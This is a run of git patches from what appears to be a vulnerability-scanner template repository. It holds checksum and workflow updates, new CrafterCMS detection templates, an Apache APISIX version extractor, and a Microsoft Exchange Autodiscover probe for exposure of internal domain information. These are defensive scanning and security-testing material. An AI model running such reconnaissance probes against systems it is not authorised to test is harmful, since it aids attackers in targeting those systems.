http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 @@ -3627,7 +3627,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:eb3de9785c4ec199f308428c8f25e37d43d94b93 +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:bae531af7faf23fccf9f5e1bf192fbc14ffc9969 http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -5420,6 +5420,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d +http/misconfiguration/installer/phpmyfaq-installer.yaml:c854a51d6f8e9bbbe41deec1965f973a7e753aa5 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 @@ -5655,7 +5656,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 -http/misconfiguration/titannit-web-exposure.yaml:ca61b80c8d10fe5c8b27923a98bddddb9461c842 +http/misconfiguration/titannit-web-exposure.yaml:90a7e87de3dc02e6f213e29f4d6bce3359464041 http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -8499,7 +8500,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:07fe2e75905885b44a32ce84cd835eb6768bd265 +templates-checksum.txt:03f78448d513dc484792dff6b49195c220854bf7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 94cbc32d6ed7d778a2fdb8b6d77d1c7c488f4618 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:29:13 +0000 Subject: [PATCH 066/375] Syncing Templates --- .github/workflows/templates-sync.yml | 66 +--------------------------- 1 file changed, 1 insertion(+), 65 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 11e44b532c..de8ff83bd5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,71 +3,7 @@ on: push: paths: - '.new-additions' - - 'http/cves/2015/CVE-2015-4455.yaml' - - 'http/cves/2019/CVE-2019-7139.yaml' - - 'http/cves/2023/CVE-2023-1892.yaml' - - 'http/cves/2023/CVE-2023-2227.yaml' - - 'http/cves/2023/CVE-2023-27032.yaml' - - 'http/cves/2023/CVE-2023-2948.yaml' - - 'http/cves/2023/CVE-2023-2949.yaml' - - 'http/cves/2023/CVE-2023-31446.yaml' - - 'http/cves/2023/CVE-2023-32077.yaml' - - 'http/cves/2023/CVE-2023-38964.yaml' - - 'http/cves/2023/CVE-2023-43208.yaml' - - 'http/cves/2023/CVE-2023-44812.yaml' - - 'http/cves/2023/CVE-2023-4521.yaml' - - 'http/cves/2023/CVE-2023-45375.yaml' - - 'http/cves/2023/CVE-2023-46347.yaml' - - 'http/cves/2023/CVE-2023-4973.yaml' - - 'http/cves/2023/CVE-2023-5003.yaml' - - 'http/cves/2023/CVE-2023-6389.yaml' - - 'http/cves/2023/CVE-2023-6989.yaml' - - 'http/cves/2024/CVE-2024-0235.yaml' - - 'http/cves/2024/CVE-2024-0881.yaml' - - 'http/cves/2024/CVE-2024-1183.yaml' - - 'http/cves/2024/CVE-2024-22927.yaml' - - 'http/cves/2024/CVE-2024-2340.yaml' - - 'http/cves/2024/CVE-2024-23917.yaml' - - 'http/cves/2024/CVE-2024-24131.yaml' - - 'http/cves/2024/CVE-2024-27956.yaml' - - 'http/cves/2024/CVE-2024-2876.yaml' - - 'http/cves/2024/CVE-2024-3136.yaml' - - 'http/cves/2024/CVE-2024-31621.yaml' - - 'http/cves/2024/CVE-2024-31848.yaml' - - 'http/cves/2024/CVE-2024-31849.yaml' - - 'http/cves/2024/CVE-2024-31850.yaml' - - 'http/cves/2024/CVE-2024-31851.yaml' - - 'http/cves/2024/CVE-2024-32399.yaml' - - 'http/cves/2024/CVE-2024-32640.yaml' - - 'http/cves/2024/CVE-2024-32651.yaml' - - 'http/cves/2024/CVE-2024-33575.yaml' - - 'http/cves/2024/CVE-2024-33724.yaml' - - 'http/cves/2024/CVE-2024-4040.yaml' - - 'http/cves/2024/CVE-2024-4348.yaml' - - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - - 'http/default-logins/crushftp/crushftp-default-login.yaml' - - 'http/default-logins/soplanning/soplanning-default-login.yaml' - - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - - 'http/exposed-panels/bonobo-server-panel.yaml' - - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' - - 'http/exposed-panels/cyberchef-panel.yaml' - - 'http/exposed-panels/femtocell-panel.yaml' - - 'http/exposed-panels/monitorr-panel.yaml' - - 'http/exposed-panels/openwebui-panel.yaml' - - 'http/exposed-panels/teamforge-panel.yaml' - - 'http/exposed-panels/tixeo-panel.yaml' - - 'http/exposed-panels/umami-panel.yaml' - - 'http/misconfiguration/installer/eyoucms-installer.yaml' - - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' - - 'http/misconfiguration/titannit-web-exposure.yaml' - - 'http/takeovers/squadcast-takeover.yaml' - - 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml' - - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' - - 'http/vulnerabilities/titan/titannit-web-rce.yaml' - - 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml' - - 'network/detection/aix-websm-detect.yaml' - - 'network/detection/bluecoat-telnet-proxy-detect.yaml' + - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 79addad201dec6b2df1da892167b644260923367 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:30:02 +0000 Subject: [PATCH 067/375] Auto Generated New Template Addition List [Sat May 11 09:30:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6adb054b53..1daa818654 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/cves/2024/CVE-2024-0200.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From 84e12a1d27a7719202e2705d50f1753eb58c2dd3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:30:08 +0000 Subject: [PATCH 068/375] Auto Generated Templates Checksum [Sat May 11 09:30:08 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2b7a03afae..54518e220d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3225,6 +3225,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac +http/cves/2024/CVE-2024-0200.yaml:29706de82fa06b1f03343e535e5635384b64f0d0 http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 @@ -5432,6 +5433,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 +http/misconfiguration/installer/setup-github-enterprise.yaml:e7fae18ff04e7d7f9a4733b5b460d81e7ad63154 http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 @@ -5597,7 +5599,6 @@ http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa42 http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b -http/misconfiguration/setup-github-enterprise.yaml:14bd64ce441f1a736a86cd8b6b5789d5e8be4792 http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c @@ -8500,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:03f78448d513dc484792dff6b49195c220854bf7 +templates-checksum.txt:8709769c62717849e03b16286968fe4a1c7fe9d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7202657d445bbc998002850a1179a7a9c5d2f7a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:30:24 +0000 Subject: [PATCH 069/375] Auto Template Signing [Sat May 11 09:30:24 UTC 2024] :robot: --- http/misconfiguration/installer/phpmyfaq-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml index c8201f32b1..8cd43c5d56 100644 --- a/http/misconfiguration/installer/phpmyfaq-installer.yaml +++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml @@ -29,3 +29,4 @@ http: part: header words: - 'phpmyfaq-setup' +# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7ed3ee5e1587206653b54c674d39cf13fdad7f81 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 11 May 2024 09:30:41 +0000 Subject: [PATCH 070/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index de8ff83bd5..cd0572411c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' workflow_dispatch: jobs: From 133474df85d2c20dee1ead2590f18772497b2ce3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 09:32:42 +0000 Subject: [PATCH 072/375] Auto Template Signing [Sat May 11 09:32:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-0200.yaml | 1 + http/misconfiguration/installer/setup-github-enterprise.yaml | 3 +-- http/misconfiguration/internal-ip-disclosure.yaml | 3 +-- 3 files changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index d7eb5bd794..da0e5881ed 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -141,3 +141,4 @@ http: part: interactsh_protocol words: - "dns" +# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml index bddf943674..cfaa8ef618 100644 --- a/http/misconfiguration/installer/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -27,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022054ec1cd746591f30334be3d3af156ab086f89a6120fb908f899320a462f7ac8e02204e63937eb2e1648bfb9cdc3f74cd58e4846ee18ad4d2db21b9e7db237578ec4e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/internal-ip-disclosure.yaml b/http/misconfiguration/internal-ip-disclosure.yaml index 790bd2e7a6..72fea3e819 100644 --- a/http/misconfiguration/internal-ip-disclosure.yaml +++ b/http/misconfiguration/internal-ip-disclosure.yaml @@ -45,5 +45,4 @@ http: part: location regex: - '^(10(?:\.\d{1,3}){3}|192\.168(?:\.\d{1,3}){2}|172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})$' - -# digest: 4a0a00473045022100be01acb985c09c3394bcce936ba1cc283802b1069e6fcc5f63196c772bd55f5a02207165d8ff2b202e511f03d2c75a241b2f933b85b3993f668651c3db8216243382:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ccecab303233a1e75a78c8d3912d25f4b57cea0f77bde7b02f472f4084515f602205c380911aaf6c5293902999ed0f4901d57b5451c7fe26b1f1d209e9fee407854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 004a01de6bad3d365f1fb34835a291a00ac66eee Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 16:35:32 +0200 Subject: [PATCH 073/375] Add files via upload --- http/exposed-panels/craftercms-panel.yaml | 34 +++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/craftercms-panel.yaml diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml new file mode 100644 index 0000000000..7e78405dd8 --- /dev/null +++ b/http/exposed-panels/craftercms-panel.yaml @@ -0,0 +1,34 @@ +id: craftercms-panel + +info: + name: CrafterCMS Login Panel - Detect + author: righettod + severity: info + description: | + CrafterCMS login panel was detected. + reference: + - https://craftercms.org/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"craftercms" + tags: panel,craftercms,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/studio/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file From 8bcf8b50813f45f627938552055882e042f9138b Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 16:50:35 +0200 Subject: [PATCH 074/375] Add files via upload --- http/technologies/craftercms-detect.yaml | 34 ++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/technologies/craftercms-detect.yaml diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml new file mode 100644 index 0000000000..e8ca729dfe --- /dev/null +++ b/http/technologies/craftercms-detect.yaml @@ -0,0 +1,34 @@ +id: craftercms-detect + +info: + name: CrafterCMS - Detect + author: righettod + severity: info + description: | + CrafterCMS was detected. + reference: + - https://craftercms.org/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"craftercms" + tags: tech,craftercms,detect + +http: + - method: GET + path: + - "{{BaseURL}}/studio" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file From b8537f802824563fcaf4f5cbe6d46ce337f1295d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 11 May 2024 17:44:52 +0200 Subject: [PATCH 075/375] Update apache-apisix-panel.yaml --- http/exposed-panels/apache/apache-apisix-panel.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 031a456b4a..3f3c0b7404 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -2,7 +2,7 @@ id: apache-apisix-panel info: name: Apache APISIX Login Panel - author: pikpikcu + author: pikpikcu,righettod severity: info description: An Apache APISIX login panel was detected. classification: @@ -30,4 +30,10 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009511db3bd4110569d3adb76780b1eae709159c92d71b9fd0e0f3665aa25c65ef02210080459d36c4880e531941e8516355f1deb7e67881bc8a203be2cf734becaa4d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + extractors: + - type: regex + part: header + group: 1 + regex: + - '(?i)Server:\s+APISIX\/([0-9.]+)' From 3ba4873cce816767d18be0eb322f4edc0b0f6e70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Sun, 12 May 2024 03:08:09 +0800 Subject: [PATCH 076/375] fix severity --- .../microsoft/ms-exchange-local-domain.yaml | 90 +++++++++---------- 1 file changed, 45 insertions(+), 45 deletions(-) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 66de26d4bc..602a0d8de5 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -1,45 +1,45 @@ -id: ms-exchange-local-domain - -info: - name: Microsoft Exchange Autodiscover - Local Domain Exposure - author: userdehghani - severity: low - description: | - Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. - impact: | - An attacker can leverage this information for reconnaissance and targeted attacks. - remediation: | - Restrict access to the Autodiscover service or configure it to not expose local domain information. - reference: - - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: http.title:outlook exchange - tags: misconfig, microsoft,ms-exchange,ad,dc - -http: - - method: GET - path: - - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" - - matchers-condition: and - matchers: - - type: regex - part: header - regex: - - "(?i)(X-Calculatedbetarget:)" - - - type: status - status: - - 200 - - 302 - - extractors: - - type: kval - kval: - - x_calculatedbetarget -# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +id: ms-exchange-local-domain + +info: + name: Microsoft Exchange Autodiscover - Local Domain Exposure + author: userdehghani + severity: info + description: | + Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. + impact: | + An attacker can leverage this information for reconnaissance and targeted attacks. + remediation: | + Restrict access to the Autodiscover service or configure it to not expose local domain information. + reference: + - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:outlook exchange + tags: misconfig, microsoft,ms-exchange,ad,dc + +http: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "(?i)(X-Calculatedbetarget:)" + + - type: status + status: + - 200 + - 302 + + extractors: + - type: kval + kval: + - x_calculatedbetarget +# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 From 6b9a8802e89ed8c0b82150f47ce301be2eee198e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 19:48:46 +0000 Subject: [PATCH 078/375] Auto Generated Templates Checksum [Sat May 11 19:48:46 UTC 2024] :robot: --- templates-checksum.txt | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 54518e220d..5609585042 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3225,7 +3225,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0200.yaml:29706de82fa06b1f03343e535e5635384b64f0d0 +http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 @@ -5421,7 +5421,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d -http/misconfiguration/installer/phpmyfaq-installer.yaml:c854a51d6f8e9bbbe41deec1965f973a7e753aa5 +http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6 http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 @@ -5433,7 +5433,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8 -http/misconfiguration/installer/setup-github-enterprise.yaml:e7fae18ff04e7d7f9a4733b5b460d81e7ad63154 +http/misconfiguration/installer/setup-github-enterprise.yaml:4c9c45144ef261e828a016e779c788a97640107d http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 @@ -5465,7 +5465,7 @@ http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a http/misconfiguration/installer/zenphoto-setup.yaml:90123a5fbb91a4f9e860152c5f07d8a141669ed8 http/misconfiguration/intelbras-dvr-unauth.yaml:d03e03c47bafc20e0abed9052e731db888770f83 -http/misconfiguration/internal-ip-disclosure.yaml:e6a79c10e8a84b1146826ec646fe0beb90b86761 +http/misconfiguration/internal-ip-disclosure.yaml:ffb198989918d9f1e1cafafcd3470931ff6eaa4e http/misconfiguration/iot-vdme-simulator.yaml:c4c40ebfaba9239c6e0c5f14e6957533cdb11631 http/misconfiguration/jaeger-ui-dashboard.yaml:4584cce5677c777fcde741579d1ba52bccec4491 http/misconfiguration/java-melody-exposed.yaml:3e4299de8400eb02ef9f769cc044e7255e87522e @@ -6685,7 +6685,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:43e1210c06cedc5762c38b9ed9690d21e0d01527 +http/technologies/favicon-detect.yaml:338fb7b684fa9ea824607e7108117bc570d495d7 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8709769c62717849e03b16286968fe4a1c7fe9d1 +templates-checksum.txt:1f0bbdcbed0ef843e234ee52039f0c523ceb65ce wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d6063dba87b5822a72feb5fbc86043b4c1c54fa4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 11 May 2024 19:50:33 +0000 Subject: [PATCH 079/375] Auto Template Signing [Sat May 11 19:50:33 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 